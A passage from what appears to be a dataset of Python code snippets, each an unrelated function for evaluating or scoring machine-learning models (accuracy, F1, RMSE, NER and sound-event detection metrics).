str(int(iteration_id) / 5)\n for tid, pred_tree in texts.items():\n gold_tree = gold[tid]\n print(iteration_id, fold, tid)\n print(gold_tree.get_triples())\n print(pred_tree.get_triples())\n for level, scores in eval_prediction([gold_tree], [pred_tree]):\n result_collector.add_result(tid, fold, level, scores)\n print(\"Done.\")", "def evaluate_model(self, predictions, expected, bypass_data_to_eval):\n\n result = []\n for i, unique_id in enumerate(np.squeeze(expected[\"unique_ids\"])):\n start_logits = predictions['tf_electra_for_question_answering'][i]\n start_top_index = predictions['tf_electra_for_question_answering_1'\n ][i]\n end_logits = predictions['tf_electra_for_question_answering_2'][i]\n end_top_index = predictions['tf_electra_for_question_answering_3'][i\n ]\n cls_logits = predictions['tf_electra_for_question_answering_4'][i]\n\n result.append(\n SquadResult(\n unique_id,\n start_logits.tolist(),\n end_logits.tolist(),\n start_top_index=start_top_index.tolist(),\n end_top_index=end_top_index.tolist(),\n cls_logits=cls_logits.tolist(),\n )\n )\n\n dev_features = bypass_data_to_eval[\"dev_features\"]\n dev_examples = bypass_data_to_eval[\"dev_examples\"]\n\n answers, nbest_answers = get_answers(\n dev_examples, dev_features, result, self._args\n )\n\n output_prediction_file = os.path.join(\n self._args.output_dir, \"predictions.json\"\n )\n output_nbest_file = os.path.join(\n self._args.output_dir, \"nbest_predictions.json\"\n )\n\n with open(output_prediction_file, \"w\") as f:\n f.write(json.dumps(answers, indent=4) + \"\\n\")\n with open(output_nbest_file, \"w\") as f:\n f.write(json.dumps(nbest_answers, indent=4) + \"\\n\")\n\n if self._args.version_2_with_negative:\n dev_file = \"dev-v2.0.json\"\n eval_file = \"evaluate-v2.0.py\"\n else:\n dev_file = \"dev-v1.1.json\"\n eval_file = \"evaluate-v1.1.py\"\n\n command_str = (\n f\"{sys.executable} {os.path.join(self._args.data_dir, eval_file)} \"\n f\"{os.path.join(self._args.data_dir, dev_file)} \"\n f\"{output_prediction_file}\"\n )\n\n logging.debug(f\"\\nExecuting: `{command_str}`\\n\")\n\n eval_out = subprocess.check_output(shlex.split(command_str))\n\n # scores: {'exact_match': 87.06717123935667, 'f1': 92.78048326711645}\n scores = json.loads(eval_out.decode(\"UTF-8\").strip())\n\n logging.debug(\"scores:\", scores)\n\n metric_units = \"f1\"\n\n return scores[metric_units], metric_units", "def evaluate(model, val_data, epoch):\n print('validating')\n\n # 设置为评估模式 \n model.eval() \n\n val_loss = []\n with torch.no_grad():\n DEVICE = config.DEVICE\n\n val_dataloader = DataLoader(dataset=val_data,\n batch_size=config.batch_size,\n shuffle=True,\n pin_memory=True, drop_last=True,\n collate_fn=collate_fn)\n\n for batch, data in enumerate(tqdm(val_dataloader)):\n\n x, y, x_len, y_len, oov, len_oovs = data\n\n if config.is_cuda:\n x = x.to(DEVICE)\n y = y.to(DEVICE)\n x_len = x_len.to(DEVICE)\n len_oovs = len_oovs.to(DEVICE)\n\n loss = model(x, x_len, y, len_oovs, batch=batch, \n num_batches=len(val_dataloader),\n teacher_forcing=True)\n\n val_loss.append(loss.item())\n\n return np.mean(val_loss)", "def eval(self):\n\n # parameters initialize\n torch = import_optional_dependency(\"torch\")\n eval_total = 0\n eval_correct = 0\n eval_loss = 0\n self._set_eval()\n\n # display the information\n if self.info:\n print(f\"\\rEvaluating...\", end=\"\")\n\n # start eval part\n for i, (source, target) in enumerate(self.eval_dataset):\n # send data to device\n source = source.to(self.device)\n target = target.to(self.device)\n\n result = 
self.model(source)\n eval_loss += self.criterion(result, target).item()\n _, predicted = torch.max(result.data, 1)\n eval_total += target.size(0)\n eval_correct += (predicted == target).sum().item()\n\n accuracy = eval_correct / eval_total\n eval_loss = eval_loss / eval_total\n\n if self.info:\n print(f\"\\rEvaluation loss: { eval_loss } | Accuracy: { accuracy }\")\n\n return eval_loss, accuracy", "def test_epe_evaluate(self):\n epe_metric = EPE()\n epe_metric.process(self.data_batch, self.data_samples)\n epe = epe_metric.evaluate(1)\n self.assertAlmostEqual(epe['EPE'], 11.5355339)", "def evaluate(self, epoch, exploration_paths):\n logger.log(\"Collecting samples for evaluation\")\n paths = self._sample_eval_paths(epoch)\n statistics = OrderedDict()\n\n statistics.update(self._statistics_from_paths(paths, \"Test\"))\n statistics.update(self._get_other_statistics())\n statistics.update(self._statistics_from_paths(exploration_paths,\n \"Exploration\"))\n\n statistics['AverageReturn'] = get_average_returns(paths)\n statistics['Epoch'] = epoch\n\n for key, value in statistics.items():\n logger.record_tabular(key, value)\n\n self.log_diagnostics(paths)", "def evaluate(model, data):\n n_targets = 0\n n_correct_predictions = 0\n\n # Set the model on evaluatio mode.\n model.eval()\n\n # Create progress bar.\n progress_bar = tqdm.tqdm(total=len(data),\n unit='batch',\n desc='[evaluate] batch accuracy: 0.000',\n leave=False)\n\n # Loop through validation batches.\n for inputs, targets in data:\n\n # Send data to GPU if CUDA is enabled.\n if next(model.parameters()).is_cuda:\n inputs = inputs.cuda()\n targets = targets.cuda()\n\n # Feed forward.\n with torch.set_grad_enabled(False):\n outputs = model(inputs)\n\n # Choose the class with maximum probability.\n _, predictions = torch.max(outputs, 1)\n\n accuracy = (predictions == targets).sum().item() / len(targets)\n progress_bar.update(1)\n progress_bar.set_description(\n '[evaluate] batch accuracy: {accuracy:.3f}'.format(\n accuracy=accuracy))\n\n # Accumulate targets and correct predictions count.\n n_targets += len(targets)\n n_correct_predictions += (predictions == targets).sum().item()\n\n # Close progress bar.\n progress_bar.close()\n\n return n_correct_predictions / n_targets", "def test_evaluation_error():\n folding = Folding(DATASET,\n reset=True)\n\n for fold in folding.fold():\n sjob = SamplingJob(fold,\n OVERSAMPLER,\n OVERSAMPLER_PARAMS)\n\n result = sjob.do_oversampling()\n\n ejob = EvaluationJob(result,\n [('smote_variants.classifiers',\n 'ErrorWarningClassifier',\n {'raise_value_error': True})])\n\n result_eval = ejob.do_evaluation()\n\n assert len(result_eval[0]['error']) > 3\n\n ejob = EvaluationJob(result,\n [('smote_variants.classifiers',\n 'ErrorWarningClassifier',\n {'raise_runtime_error': True})])\n\n result_eval = ejob.do_evaluation()\n\n assert len(result_eval[0]['error']) > 3", "def evaluate(self, data, category):\n n_data = len(data)\n eval_scores = [{} for _ in range(n_data)]\n\n # Calculate average sentence-level scores for factual consistency\n src_list, output_list = [], []\n n_sents = [] # the number of sentences in the claim\n for i in range(n_data):\n source = data[i]['source']\n system_outputs = sent_tokenize(data[i]['system_output'])\n n_sents.append(len(system_outputs))\n for j in range(len(system_outputs)):\n src_list.append(source)\n output_list.append(system_outputs[j])\n input_list = add_question(dimension=self.dim, output=output_list, src=src_list, task=self.task)\n sent_score = self.scorer.score(input_list, 
self.task, category, self.dim)\n\n # Get average score for each sample\n start_idx = 0\n score = []\n for cur_n_sent in n_sents:\n score.append(sum(sent_score[start_idx:start_idx + cur_n_sent]) / cur_n_sent)\n start_idx += cur_n_sent\n\n for i in range(n_data):\n eval_scores[i][self.dim] = score[i]\n\n return eval_scores", "def evaluate(self, session, *args, evaluate_data_iterator=None, **kwargs):\n\n raise NotImplementedError(\"Implement evaluate() method\")", "def evaluate(exe, metric, loss, correct, dev_program, data_loader,\n phase=\"eval\"):\n metric.reset()\n returns = [loss]\n if isinstance(correct, list) or isinstance(correct, tuple):\n returns.extend(list(correct))\n else:\n returns.append(correct)\n for batch in data_loader:\n exe.run(dev_program, feed=batch, \\\n fetch_list=returns)\n return_numpys = exe.run(dev_program, feed=batch, \\\n fetch_list=returns)\n metric_numpy = return_numpys[1] if len(return_numpys[\n 1:]) == 1 else return_numpys[1:]\n metric.update(metric_numpy)\n res = metric.accumulate()\n if isinstance(metric, Mcc):\n print(\"%s loss: %f, mcc: %s\" % (phase, return_numpys[0], res[0]))\n elif isinstance(metric, PearsonAndSpearman):\n print(\"%s loss: %f, pearson: %s, spearman: %s, pearson and spearman: %s\"\n % (phase, return_numpys[0], res[0], res[1], res[2]))\n else:\n print(\"%s loss: %f, acc: %s, \" % (phase, return_numpys[0], res))", "def evaluate(self):\n try:\n self._evaluate()\n except Exception as e:\n if str(e) == \"assignment destination is read-only\":\n log.exception(\n \"Encountered error during scenario evaluation. Be sure \"\n + \"that the classifier's predict() isn't directly modifying the \"\n + \"input variable itself, as this can cause unexpected behavior in ART.\"\n )\n else:\n log.exception(\"Encountered error during scenario evaluation.\")\n sys.exit(1)\n\n if self.results is None:\n log.warning(f\"{self._evaluate} did not set self.results to a dict\")\n\n self.save()", "def evaluate(self, X_test, y_test):\n y_pred_train = self.pipeline.predict(self.X)\n mse_train = mean_squared_error(self.y, y_pred_train)\n rmse_train = np.sqrt(mse_train)\n \n self.mlflow_log_metric('rmse_train', rmse_train)\n \n y_pred_test = self.pipeline.predict(X_test)\n mse_test = mean_squared_error(y_test, y_pred_test)\n rmse_test = np.sqrt(mse_test)\n self.mlflow_log_metric('rmse_test', rmse_test)\n \n return (round(rmse_train, 3) ,round(rmse_test, 3))", "def evaluate(self, data, label_indices, evaluator=np.argmax):\n\n assert(len(data) == len(label_indices))\n\n assert(len(data) == len(label_indices))\n assert(data[0].shape == (self.sizes[0], 1))\n for idx in label_indices:\n assert(idx >= 0 and idx < self.sizes[-1])\n\n results = [(evaluator(self.feedforward(x)), y)\n for (x, y) in zip(data, label_indices)]\n\n num = len(data)\n num_correct = sum(int(x == y) for (x, y) in results)\n num_incorrect = num - num_correct\n accuracy = num_correct / num\n\n return {'num_testing': len(data),\n 'num_correct': num_correct,\n 'num_incorrect': num_incorrect,\n 'accuracy': accuracy}", "def _evaluate(self,\n logits,\n predictions,\n data, evaluation_fn,\n max_eval_batches=None,\n calculate_scores=True,\n write_results=False):\n # counting the evaluation batches\n num_eval_batches = 0\n # logits and predictions from the model\n all_logits = []\n all_predictions = []\n # fetched data that led to the predictions\n # dictionary of {seq_1: [], seq_2: [], target: []}\n all_fetched_data = collections.defaultdict(list)\n try:\n while True:\n # sample predictions\n (fetched_logits,\n 
fetched_predictions,\n fetched_data) = self._fetch_data_batch(\n logits=logits, predictions=predictions, data=data)\n\n # Cache the data\n all_logits += fetched_logits\n all_predictions += fetched_predictions\n all_fetched_data[\"target\"] += fetched_data[\"target\"]\n\n # break the loop if max_eval_batches is set\n num_eval_batches += 1\n if (max_eval_batches and\n num_eval_batches >= max_eval_batches):\n break\n\n except tf.errors.OutOfRangeError:\n pass\n\n # Evaluate\n scores = None\n if calculate_scores:\n scores = evaluation_fn(\n all_predictions,\n all_fetched_data[\"seq_1\"], # Should be empty\n all_fetched_data[\"seq_2\"], # Should be empty\n all_fetched_data[\"target\"])\n\n if write_results:\n _write_results_to_csv(\n all_logits,\n all_predictions,\n all_fetched_data,\n output_dir=os.path.join(\n self._logdir, RESULTS_CSV_FNAME))\n\n return len(all_predictions), scores", "def evaluate_model(model_name, y_true, y_pred):\n\n # Calculate performance metrics\n rmse_eval = evaluate_rmse(y_true, y_pred)\n mae_eval = evaluate_mae(y_true, y_pred) \n r2_eval = evaluate_r2(y_true, y_pred)\n\n # Print results\n print_evaluation(model_name, mae_eval, rmse_eval, r2_eval)", "def main(cfg: DictConfig):\n result, evaluation_metric = evaluate(cfg)\n print(result)\n print(f\"Validation dice coefficient: {result[evaluation_metric]}\")", "def evaluate(self, X_test, y_test):\n self.run(self)\n self.y_pred = self.pipeline.predict(X_test)\n self.rmse = compute_rmse(self.y_pred, y_test)", "def mgcEval(self):\n import numpy as np\n def report_to_df(report):\n\n \"\"\"\n function to convert classification report to dataframe (for visualisation plot)\n \"\"\"\n\n report = re.sub(r\" +\", \" \", report).replace(\"avg / total\", \"avg/total\").replace(\"\\n \", \"\\n\")\n # update this due to sklearn classification report output change\n report = re.sub(r\" +\", \" \", report).replace(\"micro avg\", \"micro_avg\").replace(\"macro avg\", \"macro_avg\").replace(\"weighted avg\", \"weighted_avg\").replace(\"\\n \", \"\\n\")\n report_df = pd.read_csv(StringIO(\"Classes\" + report), sep=' ', index_col=0) \n return(report_df)\n \n #txt report to df\n class_rpttop1 = classification_report(self.y_true, self.y_pred)\n df_report = report_to_df(class_rpttop1)\n\n df_report = df_report.iloc[:self.nb_classes, :].copy()\n df_report.index = df_report.index.astype(int)\n \n\n # classifier prediction metrics\n def classMetrics(averagex):\n precision, recall, fscore, support = score(self.y_true, self.y_pred, average=averagex)\n \n return(\n print(''), \n print('-------------{0:}--------------------'.format(averagex)), \n print('precision: {0:.4f}'.format(precision)),\n print('recall: {0:.4f}'.format(recall)),\n print('fscore: {0:.4f}'.format(fscore)),\n print(''),\n print('kappa score: {0:.4f}'.format(cohen_kappa_score(self.y_true, self.y_pred))),\n print('accuracy score: {0:.4f}'.format(accuracy_score(self.y_true, self.y_pred))))\n \n def predSamp():\n\n correct = np.nonzero(self.y_pred==self.y_true)[0]\n incorrect = np.nonzero(self.y_pred!=self.y_true)[0]\n\n # quick check of the number of correct prediction from validation set\n print(\"\")\n print(\"correct/total = {0: .4f}\".format(len(correct)/(len(correct)+len(incorrect))))\n print(\"total correct sample = {0: .0f}\".format(len(correct)))\n print('------------------------------------------------------------------')\n \n def classReport():\n print('----------------------------- Classfication Report -------------------------------')\n 
print(classification_report(pd.Series(self.y_true).map(self.dict_label), pd.Series(self.y_pred).map(self.dict_label)))\n \n self.class_rpt = pd.concat([pd.DataFrame(pd.Series(df_report.index.tolist()).map(self.dict_label), columns = ['label']), df_report], axis = 1)\n \n self.classMetricsMac = classMetrics(\"macro\")\n self.classMetricsMic = classMetrics(\"micro\")\n self.predSample = predSamp()\n self.class_rptTop1 = classReport()\n \n return self", "def train_and_evaluate(name, model, train, test, evaluation, final_eval, output_dir):\n\n print(\"---\" * 5)\n print(\"Running pipeline for {}\".format(name))\n\n plot_dir = os.path.join(output_dir, \"plots\")\n\n pipeline = make_pipeline(model)\n\n X_train, y_train = train.drop(\n [\"PM10\"], axis=1).values, train[\"PM10\"].values\n X_test, y_test = test.drop([\"PM10\"], axis=1).values, test[\"PM10\"].values\n X_eval, y_eval = evaluation.drop(\n [\"PM10\"], axis=1).values, evaluation[\"PM10\"].values\n X_final, y_final = final_eval.drop(\n [\"PM10\"], axis=1), final_eval[\"PM10\"].values\n\n # first round - fit on train, predict on test\n print(\"Fitting pipeline on train data\")\n pipeline.fit(X_train, y_train)\n yhat = pipeline.predict(X_test)\n mae = mean_absolute_error(y_test, yhat)\n print(\"MAE: {}\".format(mae))\n plot_predictions(\n y_test, yhat, title=\"{} - Predicted vs. Actual on Test\".format(name), output_dir=plot_dir)\n\n # second round - fit on train + test, predict on evaluation\n X_train = np.concatenate([X_train, X_test])\n y_train = np.concatenate([y_train, y_test])\n print(\"Fitting pipeline on train + test data\")\n pipeline.fit(X_train,y_train)\n yhat = pipeline.predict(X_eval)\n mae = mean_absolute_error(y_eval,yhat)\n print(\"MAE: {}\".format(mae))\n plot_predictions(y_eval,yhat,title=\"{} - Predicted vs. Actual on Evaluation\".format(name),output_dir=plot_dir)\n\n # final round - fit on last X hours, by which the actual score will be measured\n X_train = np.concatenate([X_train, X_eval])\n y_train = np.concatenate([y_train, y_eval])\n print(\"Fitting pipeline on all \\\"all available data\\\"\")\n pipeline.fit(X_train, y_train)\n yhat = pipeline.predict(X_final)\n mae = mean_absolute_error(y_final, yhat)\n print(\"MAE: {}\".format(mae))\n plot_predictions(\n y_final, yhat, title=\"{} - Predicted vs. 
Actual\".format(name), output_dir=plot_dir)\n\n # save the model\n joblib.dump(model, os.path.join(\n output_dir, \"models\", \"{}.joblib\".format(name)))\n\n return yhat, mae", "def evaluate(network: nn.Module, data: DataLoader, metric: callable) -> list:\n error_list = []\n with torch.no_grad():\n for x, y in data:\n \n prediction = network.forward(x)\n error_list.append(metric(prediction, y))\n \n return torch.tensor(error_list)", "def evaluate(self,\n data: Union[\"SparkXShards\",\n \"SparkDataFrame\",\n \"TFDataset\",\n \"ray.data.Dataset\",\n Callable],\n batch_size: int=32,\n num_steps: Optional[int]=None,\n verbose: Union[str, int]=1,\n sample_weight: Optional[\"np.ndarray\"]=None,\n callbacks: Optional[List[\"Callback\"]]=None,\n data_config: Optional[Dict]=None,\n feature_cols: Optional[List[str]]=None,\n label_cols: Optional[List[str]]=None) -> Dict:\n if not isinstance(data, types.FunctionType):\n invalidInputError(isinstance(batch_size, int) and batch_size > 0,\n \"batch_size should be a positive integer\")\n else:\n # batch_size can be None if the return of data_creator already generates batches\n if batch_size:\n invalidInputError(isinstance(batch_size, int) and batch_size > 0,\n \"batch_size should be a positive integer\")\n # Use the local batch size for each worker to convert to XShards\n if batch_size:\n local_batch_size = batch_size // self.num_workers\n if local_batch_size <= 0:\n local_batch_size = 1\n else:\n local_batch_size = None\n logger.info(\"Starting validation step.\")\n params = dict(\n batch_size=batch_size,\n verbose=verbose,\n sample_weight=sample_weight,\n steps=num_steps,\n callbacks=callbacks,\n data_config=data_config,\n )\n from bigdl.orca.data import SparkXShards\n from bigdl.orca.data.tf.data import Dataset\n from bigdl.orca.data.tf.tf2_data import TF2Dataset\n\n data, _ = maybe_dataframe_to_xshards(data,\n validation_data=None,\n feature_cols=feature_cols,\n label_cols=label_cols,\n mode=\"evaluate\",\n num_workers=self.num_workers,\n accept_str_col=True,\n shard_size=local_batch_size)\n\n if isinstance(data, SparkXShards):\n # Make sure each worker can get at least one data partition\n if data.num_partitions() < self.num_workers:\n data = data.repartition(self.num_workers)\n if data._get_class_name() == 'pandas.core.frame.DataFrame':\n data = process_xshards_of_pandas_dataframe(data, feature_cols, label_cols)\n ray_xshards = RayXShards.from_spark_xshards(data) # type:ignore\n worker_stats = self._evaluate_ray_xshards(ray_xshards, params)\n elif isinstance(data, Dataset):\n ray_xshards = TF2Dataset(data).get_ray_xshards(self.num_workers)\n worker_stats = self._evaluate_ray_xshards(ray_xshards, params)\n elif isinstance(data, ray.data.Dataset):\n shards = data.split(n=self.num_workers, locality_hints=self.remote_workers)\n\n remote_worker_stats = []\n for shard, worker in zip(shards, self.remote_workers):\n params[\"data_creator\"] = self.process_ray_dataset(shard,\n label_cols,\n feature_cols,\n data_config)\n remote_worker_stats.append(worker.validate.remote(**params))\n worker_stats = ray.get(remote_worker_stats)\n else: # data_creator functions; should return Iter or DataLoader\n params[\"data_creator\"] = data # type:ignore\n params_list = [params] * self.num_workers\n\n worker_stats = ray.get([w.validate.remote(**params_list[i])\n for i, w in enumerate(self.remote_workers)])\n stats = worker_stats[0].copy()\n return stats", "def post_eval_callout(outdir, X_data, Y_pred, E_pred, N_SP_pred, Y_data=None , tail=None) -> None:\n \n error = 
np.sum((Y_pred[:,0:2] - Y_data[:, 0:2])**2, axis = 1)\n error = np.reshape(error, (error.shape[0],1))\n I1, _, E = compute_l2_norm(error, X_data[:,1:3], outdim=2)\n\n data = {}\n data['E_init'] = E_pred[0]\n data['E_PI'] = E_pred[1]\n data['N_SP'] = int(N_SP_pred)\n data['E_ref'] = np.sqrt(I1+ E)\n\n print(os.path.join(outdir, \"run_\" + get_prefix() +tail[:-4] + \"_error.json\"))\n out_file = open( os.path.join(outdir,\"..\", \"run_\"+get_prefix()+\"values\", \"run_\" + get_prefix() +tail[:-4] + \"_error.json\"), \"w\")\n json.dump(data, out_file, indent=4)\n out_file.close()\n \n return", "def evaluate(self) -> Dict[str, float]:\n eval_dataloader = self.get_eval_dataloader()\n\n output = self._prediction_loop(eval_dataloader, description=\"Evaluation\")\n return output.metrics", "def evaluate_model():\n\n print '\\n\\tevaluate result'\n os.system('./conlleval.pl -d \\'\\t\\' < ' + encoded_test + ' >> ' + result_file)\n print '\\t--done\\n'", "def test_run_experiment_lr_eval_with_object(self):\n source = \"lr-eval-object\"\n experiment_id = \"lr_eval_object\"\n\n configdir = join(rsmtool_test_dir, \"data\", \"experiments\", source)\n\n config_dict = {\n \"predictions_file\": \"../../files/predictions_scaled_with_subgroups.csv\",\n \"system_score_column\": \"score\",\n \"description\": \"An evaluation of LinearRegression predictions.\",\n \"human_score_column\": \"h1\",\n \"id_column\": \"id\",\n \"experiment_id\": \"lr_eval_object\",\n \"subgroups\": \"QUESTION\",\n \"scale_with\": \"asis\",\n \"trim_min\": 1,\n \"trim_max\": 6,\n }\n\n config_obj = Configuration(config_dict, context=\"rsmeval\", configdir=configdir)\n\n check_run_evaluation(source, experiment_id, config_obj_or_dict=config_obj)", "def evaluate_model():\n\n # Get the processed data (in proper format to evaluate the NER model)\n data = get_json_from_file_path(PROCESSED_DATA_PATH)\n # Split the dataset for training and test as we did for training\n train_data, test_data = train_test_split(data, train_size=0.7, \n random_state=4)\n\n # Load the model trained\n try:\n ner_model = spacy.load(OUTPUT_MODEL_PATH)\n except Exception as err:\n msg = f'Could not load the model. 
Error: {err}'\n raise Exception(msg)\n\n # Compute evaluation scores\n print('Computing metrics...')\n scores = evaluate(ner_model, test_data)\n # General metrics of the model\n f_score = scores.get('ents_f')\n precision = scores.get('ents_p')\n recall = scores.get('ents_r')\n print('\\nScoring:')\n print(f'F-score: {f_score}')\n print(f'Precision: {precision}')\n print(f'Recall: {recall}')\n\n # Get the specific scores for each entity \n scores_per_entity = scores.get('ents_per_type')\n # Get the F-score of the entities\n f_scores_of_entities = []\n for entity_scores in scores_per_entity.values():\n f_scores_of_entities.append(entity_scores['f'])\n # Compute the macro averaged F-score\n macro_avg_f_score = sum(f_scores_of_entities)/len(f_scores_of_entities)\n print(f'Macro averaged F-score: {macro_avg_f_score}')\n \n print('\\nScores per entity;')\n print('{:<15} {:<10} {:<10} {:<10}'.format('Entity','F-score','Precision','Recall'))\n for key, value in scores_per_entity.items():\n entity = key\n f, p, r = value['f'], value['p'], value['r']\n print('{:<15} {:<10.2f} {:<10.2f} {:<10.2f}'.format(entity, f, p, r))", "def runEval(self, cmdText, varName, rhs):\n\n _globals= self._globals\n\n self.logPyCode= '# Error: ' + str(varName) + '=' + str(rhs)\n try:\n rhs= self.pyFromVec(rhs)\n except:\n print(\"Error: runEval at pyFromVec: \" + rhs)\n\n try:\n rhs= self.pyFromEng(rhs)\n except:\n print(\"Error: runEval at pyFromEng: \" + rhs)\n\n saved_handler = np.seterrcall(self.err_handler)\n save_err = np.seterr(divide='call', over='call', under='call',\n invalid='call')\n\n if varName:\n self.logPyCode= str(varName) + '=' + str(rhs)\n else:\n self.logPyCode= str(rhs)\n\n try:\n result= eval(str(rhs), _globals, _globals)\n _globals[str(varName)]= result\n success= True\n except:\n self.logCommandRHS= '# Error: ' + self.logPyCode\n result= 0\n success= False\n np.seterrcall(saved_handler)\n return result, success", "def do_system_evaluation(dataset, result_path, dataset_evaluation_mode='folds'):\n\n # Set warnings off, sklearn metrics will trigger warning for classes without\n # predicted samples in F1-scoring. 
This is just to keep printing clean.\n warnings.simplefilter(\"ignore\")\n\n overall_metrics_per_scene = {}\n\n for scene_id, scene_label in enumerate(dataset.scene_labels):\n if scene_label not in overall_metrics_per_scene:\n overall_metrics_per_scene[scene_label] = {}\n\n dcase2016_segment_based_metric = DCASE2016_EventDetection_SegmentBasedMetrics(class_list=dataset.event_labels(scene_label=scene_label))\n dcase2016_event_based_metric = DCASE2016_EventDetection_EventBasedMetrics(class_list=dataset.event_labels(scene_label=scene_label))\n\n for fold in dataset.folds(mode=dataset_evaluation_mode):\n results = []\n result_filename = get_result_filename(fold=fold, scene_label=scene_label, path=result_path)\n\n if os.path.isfile(result_filename):\n with open(result_filename, 'rt') as f:\n for row in csv.reader(f, delimiter='\\t'):\n results.append(row)\n else:\n raise IOError(\"Result file not found [%s]\" % result_filename)\n\n for file_id, item in enumerate(dataset.test(fold, scene_label=scene_label)):\n current_file_results = []\n for result_line in results:\n if len(result_line) != 0 and result_line[0] == dataset.absolute_to_relative(item['file']):\n current_file_results.append(\n {'file': result_line[0],\n 'event_onset': float(result_line[1]),\n 'event_offset': float(result_line[2]),\n 'event_label': result_line[3].rstrip()\n }\n )\n meta = dataset.file_meta(dataset.absolute_to_relative(item['file']))\n\n dcase2016_segment_based_metric.evaluate(system_output=current_file_results, annotated_ground_truth=meta)\n dcase2016_event_based_metric.evaluate(system_output=current_file_results, annotated_ground_truth=meta)\n\n overall_metrics_per_scene[scene_label]['segment_based_metrics'] = dcase2016_segment_based_metric.results()\n overall_metrics_per_scene[scene_label]['event_based_metrics'] = dcase2016_event_based_metric.results()\n\n print \" Evaluation over %d folds\" % dataset.fold_count\n print \" \"\n print \" Results per scene \"\n print \" {:18s} | {:5s} | | {:39s} \".format('', 'Main', 'Secondary metrics')\n print \" {:18s} | {:5s} | | {:38s} | {:14s} | {:14s} | {:14s} \".format('', '', 'Seg/Overall','Seg/Class', 'Event/Overall','Event/Class')\n print \" {:18s} | {:5s} | | {:6s} : {:5s} : {:5s} : {:5s} : {:5s} | {:6s} : {:5s} | {:6s} : {:5s} | {:6s} : {:5s} |\".format('Scene', 'ER', 'F1', 'ER', 'ER/S', 'ER/D', 'ER/I', 'F1', 'ER', 'F1', 'ER', 'F1', 'ER')\n print \" -------------------+-------+ +--------+-------+-------+-------+-------+--------+-------+--------+-------+--------+-------+\"\n averages = {\n 'segment_based_metrics': {\n 'overall': {\n 'ER': [],\n 'F': [],\n },\n 'class_wise_average': {\n 'ER': [],\n 'F': [],\n }\n },\n 'event_based_metrics': {\n 'overall': {\n 'ER': [],\n 'F': [],\n },\n 'class_wise_average': {\n 'ER': [],\n 'F': [],\n }\n },\n }\n for scene_id, scene_label in enumerate(dataset.scene_labels):\n print \" {:18s} | {:5.2f} | | {:4.1f} % : {:5.2f} : {:5.2f} : {:5.2f} : {:5.2f} | {:4.1f} % : {:5.2f} | {:4.1f} % : {:5.2f} | {:4.1f} % : {:5.2f} |\".format(scene_label,\n overall_metrics_per_scene[scene_label]['segment_based_metrics']['overall']['ER'],\n overall_metrics_per_scene[scene_label]['segment_based_metrics']['overall']['F'] * 100,\n overall_metrics_per_scene[scene_label]['segment_based_metrics']['overall']['ER'],\n overall_metrics_per_scene[scene_label]['segment_based_metrics']['overall']['S'],\n overall_metrics_per_scene[scene_label]['segment_based_metrics']['overall']['D'],\n 
overall_metrics_per_scene[scene_label]['segment_based_metrics']['overall']['I'],\n overall_metrics_per_scene[scene_label]['segment_based_metrics']['class_wise_average']['F']*100,\n overall_metrics_per_scene[scene_label]['segment_based_metrics']['class_wise_average']['ER'],\n overall_metrics_per_scene[scene_label]['event_based_metrics']['overall']['F']*100,\n overall_metrics_per_scene[scene_label]['event_based_metrics']['overall']['ER'],\n overall_metrics_per_scene[scene_label]['event_based_metrics']['class_wise_average']['F']*100,\n overall_metrics_per_scene[scene_label]['event_based_metrics']['class_wise_average']['ER'],\n )\n averages['segment_based_metrics']['overall']['ER'].append(overall_metrics_per_scene[scene_label]['segment_based_metrics']['overall']['ER'])\n averages['segment_based_metrics']['overall']['F'].append(overall_metrics_per_scene[scene_label]['segment_based_metrics']['overall']['F'])\n averages['segment_based_metrics']['class_wise_average']['ER'].append(overall_metrics_per_scene[scene_label]['segment_based_metrics']['class_wise_average']['ER'])\n averages['segment_based_metrics']['class_wise_average']['F'].append(overall_metrics_per_scene[scene_label]['segment_based_metrics']['class_wise_average']['F'])\n averages['event_based_metrics']['overall']['ER'].append(overall_metrics_per_scene[scene_label]['event_based_metrics']['overall']['ER'])\n averages['event_based_metrics']['overall']['F'].append(overall_metrics_per_scene[scene_label]['event_based_metrics']['overall']['F'])\n averages['event_based_metrics']['class_wise_average']['ER'].append(overall_metrics_per_scene[scene_label]['event_based_metrics']['class_wise_average']['ER'])\n averages['event_based_metrics']['class_wise_average']['F'].append(overall_metrics_per_scene[scene_label]['event_based_metrics']['class_wise_average']['F'])\n\n print \" -------------------+-------+ +--------+-------+-------+-------+-------+--------+-------+--------+-------+--------+-------+\"\n print \" {:18s} | {:5.2f} | | {:4.1f} % : {:5.2f} : {:21s} | {:4.1f} % : {:5.2f} | {:4.1f} % : {:5.2f} | {:4.1f} % : {:5.2f} |\".format('Average',\n numpy.mean(averages['segment_based_metrics']['overall']['ER']),\n numpy.mean(averages['segment_based_metrics']['overall']['F'])*100,\n numpy.mean(averages['segment_based_metrics']['overall']['ER']),\n ' ',\n numpy.mean(averages['segment_based_metrics']['class_wise_average']['F'])*100,\n numpy.mean(averages['segment_based_metrics']['class_wise_average']['ER']),\n numpy.mean(averages['event_based_metrics']['overall']['F'])*100,\n numpy.mean(averages['event_based_metrics']['overall']['ER']),\n numpy.mean(averages['event_based_metrics']['class_wise_average']['F'])*100,\n numpy.mean(averages['event_based_metrics']['class_wise_average']['ER']),\n )\n\n print \" \"\n # Restore warnings to default settings\n warnings.simplefilter(\"default\")\n print \" Results per events \"\n\n for scene_id, scene_label in enumerate(dataset.scene_labels):\n print \" \"\n print \" \"+scene_label.upper()\n print \" {:20s} | {:30s} | | {:15s} \".format('', 'Segment-based', 'Event-based')\n print \" {:20s} | {:5s} : {:5s} : {:6s} : {:5s} | | {:5s} : {:5s} : {:6s} : {:5s} |\".format('Event', 'Nref', 'Nsys', 'F1', 'ER', 'Nref', 'Nsys', 'F1', 'ER')\n print \" ---------------------+-------+-------+--------+-------+ +-------+-------+--------+-------+\"\n seg_Nref = 0\n seg_Nsys = 0\n\n event_Nref = 0\n event_Nsys = 0\n for event_label in sorted(overall_metrics_per_scene[scene_label]['segment_based_metrics']['class_wise']):\n print \" {:20s} 
